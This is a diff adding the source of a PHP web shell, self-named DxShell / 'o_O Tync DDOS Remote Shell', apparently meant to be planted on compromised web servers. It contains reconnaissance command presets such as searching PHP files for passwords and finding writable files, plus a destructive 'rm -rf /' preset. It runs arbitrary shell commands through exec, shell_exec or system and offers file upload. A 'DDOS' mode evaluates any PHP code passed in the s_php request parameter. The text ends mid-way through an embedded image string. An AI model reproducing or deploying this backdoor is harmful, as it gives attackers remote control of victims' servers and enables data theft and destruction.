+'dxdir', 'dxdirsimple', 'dxfile',
+'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q',
+);
+
+$GLOB['VAR']['PHP']['Presets']=array(
+	/* Note, that no comments are allowed in the code */
+	'phpinfo'	=>	'phpinfo();',
+	'GLOBALS'	=>	'print \'<plaintext>\'; print_r($GLOBALS);',
+	'php_ini'	=>	'$INI=ini_get_all(); '
+		."\n".'print \'<table border=0><tr>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';'
+		."\n".'foreach ($INI as $param => $values) '
+		."\n\t".'print "\n".\'<tr>\''
+		."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';',
+	'extensions'	=>	'$EXT=get_loaded_extensions ();'
+		."\n".'print \'<table border=0><tr><td class="listing">\''
+		."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)'
+		."\n\t".'.\'</td></tr></table>\''
+		."\n\t".'.count($EXT).\' extensions loaded\';',
+	);
+$GLOB['VAR']['CMD']['Presets']=array(
+	'Call Nik8 with an axe'=>'[w0rning] rm -rf /',
+	'show opened ports'=>'netstat -an | grep -i listen',
+	'find config* files'=>'find / -type f -name "config*"',
+	'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password',
+	'find all writable directories and files'=>'find / -perm -2 -ls',
+	'list file attribs on a second extended FS'=>'lsattr -va',
+	'View syslog.conf'=>'cat /etc/syslog.conf',
+	'View Message of the day'=>'cat /etc/motd',
+	'View hosts'=>'cat /etc/hosts',
+	'List processes'=>'ps auxw',
+	'List user processes'=>'ps ux',
+	'Locate httpd.conf'=>'locate httpd.conf',
+	'Interfaces'=>'ifconfig',
+	'CPU'=>'/proc/cpuinfo',
+	'RAM'=>'free -m',
+	'HDD'=>'df -h',
+	'OS Ver'=>'sysctl -a | grep version',
+	'Kernel ver' =>'cat /proc/version',
+	'Is cURL installed? ' => 'which curl',
+	'Is wGET installed? ' => 'which wget',
+	'Is lynx installed? ' => 'which lynx',
+	'Is links installed? ' => 'which links',
+	'Is fetch installed? ' => 'which fetch',
+	'Is GET installed? ' => 'which GET',
+	'Is perl installed? ' => 'which perl',
+	'Where is apache ' => 'whereis apache',
+	'Where is perl ' => 'whereis perl',
+	'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"',
+	);
+
+
+###################################################################################
+####################+++++++++# F U N C T I O N S #+++++++++++++####################
+###################################################################################
+function DxError($errstr)
+{global $DX_Header_drawn;print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>'
+	.'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>'
+	.'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';}
+
+function DxWarning($warn)
+{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';}
+
+function DxImg($imgname)
+{
+global $DXGLOBALSHIT;
+if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */
+return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">';
+}
+
+function DxSetCookie($name, $val, $exp)
+{
+if (!headers_sent()) return setcookie($name, $val, $exp, '/');
+?>
+<script>
+var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;";
+document.cookie = curCookie;
+</script>
+<?
+}
+
+function DxRandom($range='48-57,65-90,97-122')
+{
+$range=explode(',',$range);
+$range=explode('-',	$range[  rand(0,count($range)-1)  ]   );
+return rand($range[0],$range[1]);
+}
+
+function DxRandomChars($num)
+{
+$ret='';
+for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122'));
+return $ret;
+}
+
+function DxZeroedNumber($int, $totaldigits)
+{
+$str=(string)$int;
+while (strlen($str)<$totaldigits) $str='0'.$str;
+return $str;
+}
+
+function DxPrint_ParamState($name, $state, $invert=false)
+{
+print $name.' : '; $invert=(bool)$invert;
+if (is_bool($state))
+		 print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>';
+	else print '<b>'.$state.'</b>';
+}
+
+function DxStr_FmtFileSize($size)
+{
+	if($size>= 1073741824)  {$size = round($size / 1073741824 * 100) / 100 . " GB";	}
+elseif($size>= 1048576) 	{$size = round($size / 1048576 * 100) / 100 . " MB";	}
+elseif($size>= 1024) 		{$size = round($size / 1024 * 100) / 100 . " KB";		}
+					   else {$size = $size . " B";}
+return $size;
+}
+
+function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); }
+
+function DxDesign_DrawBubbleBox($header, $body, $width)
+{
+$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header);
+$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body);
+return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' ';
+}
+
+function DxChmod_Str2Oct($str)   /*  rwxrwxrwx => 0777 */
+{
+$str = str_pad($str,9,'-');
+$str=strtr($str,	array('-'=>'0','r'=>'4','w'=>'2','x'=>'1')		);
+$newmode='';
+for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2];
+
+return $newmode;
+}
+
+function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */
+{
+$info='';
+if (($perms & 0xC000) == 0xC000) $info = 'S'; /*  Socket */
+	elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */
+elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */
+elseif (($perms & 0x6000) == 0x6000) $info = 'B';  /* Block special */
+elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/
+elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/
+elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/
+else $info = '?'; /* Unknown */
+if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>';
+/* Owner */
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+		(($perms & 0x0800) ? 's' : 'x' ) :
+		(($perms & 0x0800) ? 'S' : '-'));
+$info .= '/';
+/* Group */
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+		(($perms & 0x0400) ? 's' : 'x' ) :
+		(($perms & 0x0400) ? 'S' : '-'));
+$info .= '/';
+/* World */
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+		(($perms & 0x0200) ? 't' : 'x' ) :
+		(($perms & 0x0200) ? 'T' : '-'));
+
+ return $info;
+}
+
+function DxFileToUrl($filename)
+{/* kills & and = to be okay in URL */
+return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename);
+}
+
+function DxFileOkaySlashes($filename)
+{return str_replace('\\', '/', $filename);}
+
+function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */
+{
+global $GLOB;
+if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these);
+
+$ret=$_SERVER['PHP_SELF'].'?';
+if (!empty($_GET))
+	for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+		if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */
+			($do=='kill' AND !in_array($INDEXES[$i], $these))
+			OR
+			($do=='leave' AND in_array($INDEXES[$i], $these))
+			 ))
+			$ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1);
+return $ret;
+}
+
+function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */
+{
+$link=substr(strchr(DxURL($do, $these), '?'), 1);
+$link=explode('&', $link);
+print "\n".'<!--$_GET;-->';
+for ($i=0, $COUNT=count($link); $i<$COUNT; $i++)
+	{
+	$cur=explode('=', $link[$i]);
+	print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">';
+	}
+}
+
+function DxGotoURL($URL, $noheaders=false)
+{
+if ($noheaders or headers_sent())
+	{
+	print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>';
+	print '<script>location="'.$URL.'";</script>';
+	/* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */
+	}
+	else
+	header('Location: '.$URL);
+return 1;
+}
+
+if (!function_exists('mime_content_type'))
+	{
+	if ($GLOB['SYS']['OS']['id']!='Win')
+		{	function mime_content_type($f)
+			{
+			$f = @escapeshellarg($f);
+			return @trim(`file -bi `.$f);
+			}
+			}
+		else
+		{
+			function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */
+		}
+	}
+
+
+function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */
+{
+$MySQL_Return_Array=array();
+
+if ($MySQL_res===false) return 0;
+if ($MySQL_res===true)	return 0;
+
+$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0;
+
+if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {}
+	else	 while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {}
+array_pop($MySQL_Return_Array);
+
+for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */
+	{
+	if ($i==0)
+		{
+		$INDEXES=array_keys($MySQL_Return_Array[$i]);
+		$count=count($INDEXES);
+		}
+	for ($j=0; $j<$count; $j++)
+		{
+		$key=&$INDEXES[$j];
+		$val=&$MySQL_Return_Array[$i][$key];
+		if (is_string($val)) $val=stripcslashes($val);
+		}
+	}
+return $ret;
+}
+
+function DxMySQLQ($query, $die_on_err)
+{
+$q=mysql_query($query);
+if (mysql_errno()!=0)
+	{
+	DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error());
+	if ($die_on_err) die();
+	}
+return $q;
+}
+
+function DxDecorVar(&$var, $htmlstr)
+{
+if (is_null($var)) return 'NULL';
+if (!isset($var)) return '[!isset]';
+
+if (is_bool($var))		return ($var)?'true':'false';
+if (is_int($var))   	return (int)$var;
+if (is_float($var)) 	return number_format($var, 4, '.', '');
+if (is_string($var))
+	{
+	if (empty($var)) return '&nbsp;';
+	if (!$htmlstr)	return ''.($var).'';
+			   else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).'';
+	}
+if (is_array($var))		return '(ARR)'.var_export($var, true).'(/ARR)';
+if (is_object($var))	return '(OBJ)'.var_export($var, true).'(/OBJ)';
+if (is_resource($var))	return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)';
+return '(???)'.var_export($var, true).'(/???)';
+}
+
+function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array())
+{
+if (!empty($posts))
+	{
+	$postValues='';
+	foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';}
+	$postValues = substr( $postValues, 0, -1 );
+	$method = 'POST';
+	} else $postValues = '';
+
+ if (!empty($cookie))
+	{
+	$cookieValues='';
+	foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';}
+	$cookieValues = substr( $cookieValues, 0, -1 );
+	} else $cookieValues = '';
+
+$request  = $method.' '.$URL.' HTTP/1.1'."\r\n";
+if (!empty($host))			$request .= 'Host: '.$host."\r\n";
+if (!empty($cookieValues))	$request .='Cookie: '.$cookieValues."\r\n";
+if (!empty($user_agent))	$request .= 'User-Agent: '.$user_agent.' '."\r\n";
+$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */
+if (!empty($referer))		$request .= 'Referer: '.$referer."\r\n";
+if ( $method == 'POST' )
+	{
+	$lenght = strlen( $postValues );
+	$request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n";
+	$request .= 'Content-Length: '.$lenght."\r\n";
+	$request .= "\r\n";
+	$request .= $postValues;
+	}
+$request.="\r\n\r\n";
+return $request;
+}
+
+function DxFiles_UploadHere($path, $filename, &$contents)
+{if (empty($contents)) die(DxError('Received empty'));
+$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename;
+if (!($f=fopen($path.$filename, 'w')))
+	{
+	$path='/tmp/';
+	if (!($f=fopen($path.$filename, 'w')))
+		die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =('));
+		else
+		DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)');
+	}
+fputs($f, $contents);
+fclose($f);
+print "\n".'Saved file to "'.$path.$filename.'" - OK';
+print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';;
+}
+
+function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */
+{
+$OUT=array(); $RET='';
+if (function_exists('exec'))
+	{	if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */
+	return array(true,true,'exec', '');
+	}
+	elseif  (function_exists('shell_exec'))
+	{	if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */
+	return array(true,false,'shell_exec', '<s>exec</s> shell_exec');
+	}
+	elseif  (function_exists('system'))
+	{	if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */
+	return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =(');
+	}
+	else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');;
+}
+
+###################################################################################
+#####################++++++++++++# L O G I N #++++++++++++++++#####################
+###################################################################################
+if (   isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false   )
+	{ /* IMGS are allowed without passwd =) */	$GLOB['SHELL']['USER']['Login']='';
+	$GLOB['SHELL']['USER']['Passw']='';
+	}
+
+if (	isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false   )
+	{
+	if ($DXGLOBALSHIT)
+		{		if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1);
+		}
+		else
+		{
+		header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"');		header('HTTP/1.0 401 Unauthorized');
+		}
+
+	print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>';
+	DxGotoURL(DxURL('kill',''), '1noheaders');
+	die();
+	}
+
+if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2))
+	{	if ($DXGLOBALSHIT)
+		{		if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC']))
+			{			if (!(
+
+				((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */
+				(@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw']
+							OR
+				(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw']))
+				))
+						OR
+				@$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */
+
+				))
+				{print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);}
+				else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2);
+				}
+		if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC']))
+			{
+			print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">';
+			print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>';
+			print "\n".'</form>';
+			die();
+			}
+		}
+		else
+		{
+		if (!isset($_SERVER['PHP_AUTH_USER']))
+			{
+			header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+			else
+			if (!(	$_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login']
+			AND (
+					$_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw']
+								OR
+					(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw'])
+					)
+					))
+			{
+			header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+		}
+	}
+
+###################################################################################
+####################++++++# I N S T A N T    U S A G E #+++++++####################
+###################################################################################
+if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']);
+if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php']  */
+	{
+	$F = $_GET + $_POST;
+	if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!');
+	eval(stripslashes($F['s_php']));
+	die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':''));
+	}
+if ($_GET['dxmode']=='IMG')
+	{
+	$IMGS=array(
+		'DxS'	=> 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=',
+		'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=',
+		'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=',
+		'view'	=> 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==',
+		'del'	=> 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7',
+		'copy'	=> 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==',
+		'move'	=> 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7',
+		'exec'	=> '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